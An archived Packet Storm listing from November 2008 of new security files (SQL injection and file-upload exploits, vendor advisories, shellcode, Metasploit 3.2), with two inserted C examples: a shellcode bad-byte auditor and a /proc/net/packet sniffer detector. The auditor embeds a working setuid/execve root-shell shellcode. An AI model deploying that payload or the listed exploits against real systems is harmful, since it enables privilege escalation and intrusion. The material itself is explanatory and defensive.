Packet Storm's last 50 added files. Last Updated: Thu Nov 20 15:30:34 EST 2008
[ return-to-libc-linux.txt ] acf1023db639cd181a4dceb740a63236 Brief whitepaper discussing return-to-libc exploitation on Linux.
[ stack-overflow-linux.txt ] 543012dabf952e42181c2d4cb8c71714 Brief whitepaper discussing stack overflow exploitation on Linux.
[ backlinkspider-sql.txt ] 4a61726e2c223e482fc8c834067d96b7 The BackLinkSpider Exchange Links script suffers from remote SQL injection vulnerabilities in links.asp and links.php.
[ exodus-injection.txt ] c0c091b687a3e2eccfb4d3201993ab31 Exodus version 0.10 suffers from a URI handler arbitrary parameter injection vulnerability.
[ smallest_setuid_execve_sc.c ] 555182da9a4a0a07f261cc1b9a164f39 26 byte (the smallest) GNU/Linux x86 setuid/execve shellcode with no NULL bytes.
[ wportfolio-upload.txt ] a6d0b79dc4160fd1a42267f9f46dbf37 wPortfolio versions 0.3 and below remote arbitrary file upload exploit.
[ boastmachine-sql.txt ] a68e3a773a51a05f93575744cf367a59 BoastMachine version 3.1 suffers from a remote SQL injection vulnerability.
[ SSRT080059.txt ] 95772fbd64f5296b53746839ca3c082f HP Security Bulletin - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to allow cross site scripting (XSS).
[ punportal-lfi.txt ] c74197b9cc2ffa66839c60e8759a6b6a PunPortal PunBB module version 0.1 local file inclusion exploit.
[ prejobboard-sql.txt ] cce036725cb757bbdfeadad1f0e18b75 Pre Job Board suffers from a SQL injection vulnerability that allows for authentication bypass.
[ MDVSA-2008-220-1.txt ] d32925083aefe39798a9b266a8cf683e Mandriva Linux Security Advisory 2008-220-1 - Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel. The issues include insecure misconfigurations, an integer overflow, and more.
[ MDVSA-2008-232.txt ] 74d6e20e2de494366564f42bf606f8cb Mandriva Linux Security Advisory 2008-232 - The ACL plugin in dovecot prior to version 1.1.4 treated negative access rights as though they were positive access rights, which allowed attackers to bypass intended access restrictions. The ACL plugin in dovecot prior to version 1.1.6 allowed attackers to bypass intended access restrictions by using the 'k' right to create unauthorized 'parent/child/child' mailboxes.
[ USN-674-1.txt ] 40785ad48c0633533c0dbc0debeac5a5 Ubuntu Security Notice USN-674-1 - It was discovered that the hpssd tool of hplip did not validate privileges in the alert-mailing function. A local attacker could exploit this to gain privileges and send e-mail messages from the account of the hplip user. This update alters hplip behavior by preventing users from setting alerts and by moving alert configuration to a root-controlled /etc/hp/alerts.conf file. It was also discovered that the hpssd tool of hplip did not correctly handle certain commands. A local attacker could use a specially crafted packet to crash hpssd, leading to a denial of service.
[ dsa-1667-1.txt ] fdd93fd43d34cbb3a7fa480d18402fca Debian Security Advisory 1667-1 - Several vulnerabilities have been discovered in the interpreter for the Python language.
[ revsense-sql.txt ] 6aa053d65dd314b32171368e6bf84ae6 RevSense suffers from a remote SQL injection vulnerability that allows for authentication bypass.
[ maurycms-upload.txt ] 63cc458d0d8e69152b1c8c27b36a2bf7 MauryCMS versions 0.53.2 and below remote shell upload exploit.
[ linksautomation-sql.txt ] 0ff9ea758f37cbf93c812e824cb8af98 LinksAutomation Script suffers from a remote SQL injection vulnerability.
[ linksxs-sql.txt ] 165976435e2cf54668de8896135ccc8e Linksxs Script suffers from a remote SQL injection vulnerability.
[ ethiclinks-sql.txt ] 840182c3b5760545c2554f36f44507c5 Ethiclinks suffers from a remote SQL injection vulnerability.
[ easyeditcms-sql.txt ] ddd126108668940b95b0c3f58edc0366 Easyedit CMS suffers from multiple remote SQL injection vulnerabilities.
[ msvista-overflow.txt ] 8d9062372b98a602f3a22fe236506963 The Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable buffer overflow that corrupts kernel memory. Proof of concept test code included.
[ mytopix-sql.txt ] 8e0559a875dc85728184e0a26a62eb96 MyTopix versions 1.3.0 and below remote SQL injection exploit.
[ punbb-lfi.txt ] 4e17d4daf83b92da03922224ce17aa79 PunBB (Private Messaging System versions 1.2.x) multiple local file inclusion exploit.
[ PR08-09.txt ] 027955185dafd3359535c914e02f64fa An unauthenticated file retrieval vulnerability exists in the Sun Java System Identity Manager.
[ PR07-40.txt ] de90de2dfb7bb15c9207cdcfb1dc6b7e The 3Com AP 8760 suffers from authentication bypass, password leakage, and SNMP injection vulnerabilities. Details provided.
[ PR07-11.txt ] 8a27d91e43fbb3bc2fb530f8741b2c77 Sun Java System Identity Manager suffers from a cross site request forgery vulnerability. Proof of concept code included.
[ secunia-streamripper.txt ] 2a667b6f5ea4090920bfdfceb7fa6c61 Secunia Research has discovered some vulnerabilities in Streamripper, which can be exploited by malicious people to compromise a user's system. Version 1.63.5 is affected.
[ tonline-multi.txt ] 4f545cb45287d94079f395be11241a87 The T-Online software offered by Deutsche Telekom installs and makes use of vulnerable DLLs.
[ sudoers-shellcode.txt ] 75ac9ea204450e8db590b8f578f55103 86 byte Linux/x86 shellcode that edits /etc/sudoers to grant full access.
[ pysumpas-0.2.0.tar.gz ] 9c1a5f0718d2f7566344fdd2ba118882 PySumpas is a simple, graphical password generating utility. Using the Python Cryptography Toolkit and Damien Miller's py-bcrypt, it generates a hash or ciphertext from user input. The resulting output, in part or in its entirety, can be used as a secure password.
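The two shellcode entries above (smallest_setuid_execve_sc.c and sudoers-shellcode.txt) both advertise a byte sequence free of NULLs, which is the property that decides whether a payload survives a strcpy()-style copy. The following is an added example, not Packet Storm's code and not either shellcode author's: a small C audit that counts the bytes a given delivery vector cannot carry. The sample payload is a constructed, classic 30-byte Linux/x86 setuid(0) + execve("/bin//sh") sequence written here for illustration, not the listed 26-byte file, and the bad-byte sets are assumptions for two common vectors.

```c
/* Added example, not code from Packet Storm or from the listed shellcode
 * authors: audit a shellcode buffer for bytes that a given delivery vector
 * cannot carry. strcpy()-style copies stop at 0x00; sscanf()/strtok()
 * style parsers also break on whitespace, so each vector gets its own
 * bad-byte set (constructed here as assumptions). */
#include <stddef.h>
#include <stdio.h>

/* Constructed sample: setuid(0), then execve("/bin//sh", ["/bin//sh"], NULL). */
static const unsigned char sample_sc[] =
    "\x31\xdb"              /* xor  ebx, ebx                          */
    "\x8d\x43\x17"          /* lea  eax, [ebx+0x17]  ; __NR_setuid=23 */
    "\xcd\x80"              /* int  0x80                              */
    "\x31\xc0"              /* xor  eax, eax                          */
    "\x50"                  /* push eax              ; string NUL     */
    "\x68\x2f\x2f\x73\x68"  /* push "//sh"                            */
    "\x68\x2f\x62\x69\x6e"  /* push "/bin"                            */
    "\x89\xe3"              /* mov  ebx, esp         ; filename       */
    "\x50"                  /* push eax              ; envp = NULL    */
    "\x53"                  /* push ebx              ; argv[0]        */
    "\x89\xe1"              /* mov  ecx, esp         ; argv           */
    "\xb0\x0b"              /* mov  al, 11           ; __NR_execve    */
    "\xcd\x80";             /* int  0x80                              */
#define SAMPLE_SC_LEN (sizeof(sample_sc) - 1)   /* 30 bytes; drop the literal's NUL */

/* The same "eax = 11" written the naive way: mov eax, 11 encodes three
 * NULs, which is exactly why shellcode uses mov al, 11 instead. */
static const unsigned char naive_mov_eax[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };

/* Bad-byte sets for two common vectors (assumed for this example). */
static const unsigned char bad_strcpy[] = { 0x00 };
static const unsigned char bad_whitespace[] = { 0x00, 0x09, 0x0a, 0x0d, 0x20 };

/* Count bytes of sc[0..len) that occur in bad[0..nbad). If first is
 * non-NULL it receives the offset of the first hit, or len when clean. */
size_t count_bad_bytes(const unsigned char *sc, size_t len,
                       const unsigned char *bad, size_t nbad, size_t *first)
{
    size_t hits = 0, first_hit = len;
    for (size_t i = 0; i < len; i++) {
        for (size_t j = 0; j < nbad; j++) {
            if (sc[i] == bad[j]) {
                if (first_hit == len) first_hit = i;
                hits++;
                break;
            }
        }
    }
    if (first) *first = first_hit;
    return hits;
}

/* 1 when the buffer can be delivered through a vector with this bad set. */
int shellcode_is_clean(const unsigned char *sc, size_t len,
                       const unsigned char *bad, size_t nbad)
{
    return count_bad_bytes(sc, len, bad, nbad, NULL) == 0;
}

int main(void)
{
    size_t first;
    printf("sample: %zu bytes, %zu NUL(s)\n", (size_t)SAMPLE_SC_LEN,
           count_bad_bytes(sample_sc, SAMPLE_SC_LEN, bad_strcpy, 1, NULL));
    printf("sample whitespace-safe: %s\n",
           shellcode_is_clean(sample_sc, SAMPLE_SC_LEN, bad_whitespace,
                              sizeof bad_whitespace) ? "yes" : "no");
    count_bad_bytes(naive_mov_eax, sizeof naive_mov_eax, bad_strcpy, 1, &first);
    printf("naive mov eax,11: first NUL at offset %zu\n", first);
    return 0;
}
```

Run it against any payload before embedding it: a hit in bad_strcpy means the copy truncates the shellcode at that offset, and a hit in bad_whitespace means a tokenizing parser will split it. The naive_mov_eax buffer shows why the listed shellcodes use 8-bit register forms such as mov al, 11.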
[ alexarticle-upload.txt ] 8fa701b438aefcdc974a713bbb55d89a Alex Article-Engine version 1.3.0 suffers from a remote arbitrary file upload vulnerability.
[ alexnews-upload.txt ] 71f4fe9cb8a232d39997f21b36f87ebf Alex News-Engine version 1.5.1 suffers from a remote arbitrary file upload vulnerability.
[ framework-3.2.tar.gz ] d543bda031b36a247912aa9c6a0f74d9 The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
[ MDVSA-2008-231.txt ] 3c2bacdc0c614a94c24a9030e3f7f962 Mandriva Linux Security Advisory 2008-231 - Drew Yao of the Apple Product Security Team found two flaws in libxml2. The first is a denial of service flaw in libxml2's XML parser. If an application linked against libxml2 were to process certain malformed XML content, it could cause the application to enter an infinite loop. The second is an integer overflow that caused a heap-based buffer overflow in libxml2's XML parser. If an application linked against libxml2 were to process certain malformed XML content, it could cause the application to crash or possibly execute arbitrary code. The updated packages have been patched to correct these issues.
[ USN-673-1.txt ] 64f6a2da847d9cc80f75dd91c5ce02f7 Ubuntu Security Notice USN-673-1 - Drew Yao discovered that libxml2 did not correctly handle certain corrupt XML documents. If a user or automated system were tricked into processing a malicious XML document, a remote attacker could cause applications linked against libxml2 to enter an infinite loop, leading to a denial of service. Drew Yao also discovered that libxml2 did not correctly handle large memory allocations. If a user or automated system were tricked into processing a very large XML document, a remote attacker could cause applications linked against libxml2 to crash, leading to a denial of service.
[ DSECRG-08-039.txt ] 75fd4e17221c2d6c784ac7ab1a410e8b Pluck CMS version 4.5.3 suffers from a local file inclusion vulnerability in data/inc/lib/pcltar.lib.php.
[ strongswan-4.2.9.tar.gz ] cf477bf5da424489e4d3cbff9c561eb7 strongSwan is a complete IPsec and IKEv1 implementation for Linux 2.4 and 2.6 kernels. It interoperates with most other IPsec-based VPN products. It is a descendant of the discontinued FreeS/WAN project. The focus of the strongSwan project is on strong authentication mechanisms using X.509 public key certificates and optional secure storage of private keys on smartcards through a standardized PKCS#11 interface. A unique feature is the use of X.509 attribute certificates to implement advanced access control schemes based on group memberships.
[ hodetector-shellcode.txt ] ec01d4ed393174d135c4ba3ee033f19e Ho' Detector is shellcode that detects sniffing on all interfaces in Linux by parsing /proc/net/packet.
[ directory-rfi.txt ] 7f8bed2e75d5eaeb1c1b72536868bae2 Free Directory Script version 1.1.1 suffers from a remote file inclusion vulnerability.
[ CESA-2008-009.html ] a5218b3dbe84d9457e5d725d2e5b90c9 Firefox versions 2.0.0.18 and below and WebKit nightly are affected by a cross-domain arbitrary image theft vulnerability.
[ cups-dos.txt ] 1ef452ec2c616d611a578d9e2fb24e5e CUPS version 1.3.7 cross site request forgery remote crash exploit that makes use of the add RSS subscription functionality.
[ SSRT080164.txt ] af2cc68c5723cced78fc00d623c7ba29 HP Security Bulletin - Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA; please check the table in the Resolution section of this Security Bulletin.
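The Ho' Detector entry above describes the technique without showing it: every PF_PACKET socket on the host is listed in /proc/net/packet, so a sniffer such as tcpdump shows up there as a running socket that asks for every protocol (ETH_P_ALL, printed as 0003). The following is an added example, not Packet Storm's code and not the Ho' Detector author's shellcode: a plain C parser for that table that flags such sockets. The column layout follows the kernel's packet_seq_show() output (sk, RefCnt, Type, Proto, Iface, R, Rmem, User, Inode), the sample table is constructed for this example, and the classification rule (running, and either ETH_P_ALL or SOCK_RAW) is this example's own heuristic.

```c
/* Added example, not from Packet Storm or the Ho' Detector author: parse
 * /proc/net/packet the way a userland sniffer detector would and flag
 * PF_PACKET sockets that capture every protocol. The sample table below is
 * constructed; its columns follow the kernel's packet_seq_show() layout. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ETH_P_ALL_VAL 0x0003   /* "Proto" column value for ETH_P_ALL */
#define SOCK_RAW_VAL  3        /* "Type" column value for SOCK_RAW   */

struct pkt_sock {
    int refcnt, type, proto, ifindex, running;
    unsigned long inode;
};

/* Constructed sample: one tcpdump-style socket, one DGRAM socket that only
 * wants IP (proto 0800) on all interfaces, and one raw socket that is not
 * running (R column 0). */
static const char sample_table[] =
    "sk       RefCnt Type Proto  Iface R Rmem   User   Inode\n"
    "ffff88003c2a1800 3      3    0003   2     1 0      0      18342\n"
    "ffff88003c2a2000 2      2    0800   0     1 0      0      9934\n"
    "ffff88003c2a2800 2      3    0003   0     0 0      0      9935\n";

/* Parse one data row. Returns 1 on success, 0 for the header or junk:
 * "%*s" skips the socket address, then the eight numeric columns follow. */
int parse_packet_row(const char *line, struct pkt_sock *s)
{
    unsigned rmem, uid;
    return sscanf(line, "%*s %d %d %x %d %d %u %u %lu",
                  &s->refcnt, &s->type, &s->proto, &s->ifindex,
                  &s->running, &rmem, &uid, &s->inode) == 8;
}

/* Heuristic used here: a running socket that either asks for every
 * protocol (ETH_P_ALL) or is SOCK_RAW. ifindex 0 means it is not bound to
 * a single interface and therefore sees traffic on all of them. */
int is_sniffer(const struct pkt_sock *s)
{
    return s->running && (s->proto == ETH_P_ALL_VAL || s->type == SOCK_RAW_VAL);
}

/* Walk the whole table text line by line; returns the number of sniffer
 * sockets, copying up to max of them into found (found may be NULL). */
int count_sniffers(const char *table, struct pkt_sock *found, int max)
{
    char buf[256];
    int n = 0;
    const char *p = table;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        size_t len = full < sizeof buf ? full : sizeof buf - 1;
        struct pkt_sock s;
        memcpy(buf, p, len);
        buf[len] = '\0';
        if (parse_packet_row(buf, &s) && is_sniffer(&s)) {
            if (found && n < max) found[n] = s;
            n++;
        }
        p = nl ? nl + 1 : p + full;
    }
    return n;
}

int main(void)
{
    static char live[65536];
    const char *table = sample_table;
    struct pkt_sock found[32];
    FILE *f = fopen("/proc/net/packet", "r");   /* fall back to the sample */
    if (f) {
        size_t got = fread(live, 1, sizeof live - 1, f);
        fclose(f);
        live[got] = '\0';
        if (got > 0) table = live;
    }
    int n = count_sniffers(table, found, 32);
    printf("%d sniffer socket(s)%s\n", n,
           table == sample_table ? " in constructed sample" : "");
    for (int i = 0; i < n && i < 32; i++)
        printf("  inode %lu type %d proto 0x%04x iface %d%s\n",
               found[i].inode, found[i].type, found[i].proto, found[i].ifindex,
               found[i].ifindex == 0 ? " (all interfaces)" : "");
    return 0;
}
```

On a live host the inode column is what ties a hit back to a process: search /proc/*/fd for a symlink named socket:[inode]. The check only sees the caller's network namespace, and a kernel module that hides its socket from procfs is outside what this table can show.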
[ etopbizlinkback-insecure.txt ] 3d645ee9d2340964a69cb6cb2555b35a E-topbiz Link Back Checker 1 suffers from an insecure cookie handling vulnerability that allows for administrative take-over.
[ Vulnerability_Advisory_SSH.txt ] 16c645098b7071120522e483e24bd2dc A design flaw in the SSH specification allows an attacker with control over the network to recover up to 32 bits of plaintext from an SSH-protected connection in the standard configuration. The vulnerability has been verified against OpenSSH 4.7p1; other versions may also be susceptible.
[ musicbox238-sql.txt ] 0cfd65ddce5aa54f6ea1a290f20efd38 Musicbox versions 2.3.8 and below suffer from a remote SQL injection vulnerability. This was discovered in the previous version and the vendor still has not fixed it.
[ noIPwn3r.c ] 94f7539a2f526191e3041ebd0c0eaa10 No-IP DUC versions 2.1.7 and below remote code execution exploit with reverse shell functionality.
[ USN-672-1.txt ] 157f26b3a109779716d5541904cd8ff7 Ubuntu Security Notice USN-672-1 - Moritz Jodeit discovered that ClamAV did not correctly handle certain strings when examining a VBA project. If a remote attacker tricked ClamAV into processing a malicious VBA file, ClamAV would crash, leading to a denial of service.
[ USN-667-1.txt ] d2b66e3a70af631dd3be6f985f566dab Ubuntu Security Notice USN-667-1 - A large number of vulnerabilities have been addressed in Firefox. Flaws such as information disclosure, bypassing of same-origin checks, arbitrary code execution, and more exist in prior versions.
[ rtm-essential5.pdf ] 3c9e911783a5d2349ab31f835294d08d Road Technological Minds - Essential #5 - This issue covers fuzzing, remote file inclusion, Samurai Framework testing, and more. Written in Spanish.
[ videoscript-password.txt ] 120245d21bb302fad23e901c4a649add VideoScript versions 4.0.1.50 and below administrative password changing exploit.